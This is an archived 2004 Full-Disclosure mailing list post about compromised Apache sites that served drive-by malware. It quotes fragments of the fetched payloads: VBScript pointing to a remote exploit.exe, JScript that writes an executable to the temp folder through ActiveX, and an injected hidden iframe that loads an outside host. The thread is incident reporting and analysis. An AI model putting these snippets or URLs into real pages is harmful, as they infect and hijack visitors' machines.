lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040523171655.78454.qmail@web60606.mail.yahoo.com>
From: geggam692000 at yahoo.com (D B)
Subject: browser hijack by apache sites

 using konqueror i got it to download these two files 

Filename 1: 2DimensionOfExploitsEnc.php

<html>

<script language=vbs>
szURL = "http://www.pizdato.biz/acc1/exploit.exe"
</script>

<script language="VBScript.Encode">

Filename 2: object2.cfm

<script language=jscript>
self.moveTo(5000,5000);
self.close();
fs=new ActiveXObject("Scripting.FileSystemObject");
fname=fs.GetSpecialFolder(2)+'\\q381275.exe';
a=fs.CreateTextFile(fname,true);
a.Write('MZ');
a.Close();
a=fs.OpenTextFile(fname,8,false,true);



>Message: 1
>From: Filbert <filbert@...dora.be>
>Reply-To: filbert@...dora.be
>To: full-disclosure@...ts.netsys.com
>Date: Sun, 23 May 2004 15:19:30 +0200
>Organization: Hell
>Subject: [Full-Disclosure] browser hijack by apache
>sites

>Hi,

>This is the second time this weekend that I've been
>warned of an apache 
>site 
>on a Linux server were a line of code was added to
>redirect browsers to  
>porn 
>sites.
>First was the site of a Belgian political party.
>Second came today, and 
>as of 
>writing this it's still there. The admin was informed
>so it can be gone 
>soon.

>hxxp://www.previsit.com/carrefour/nl/ <- hxxp must
>changed to http
>IE users do NOT click.

>the code added at the bottom is:

><iframe SRC="http://www.b00gle.com/fa/?d=get" WIDTH=1

>HEIGHT=1></iframe></body>

>anyone seen this before? What vulnerability is
>exploited here? FP?

>Thx,
>Filb.


	
		
__________________________________
Do you Yahoo!?
Yahoo! Domains – Claim yours for only $14.70/year
http://smallbusiness.promotions.yahoo.com/offer 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ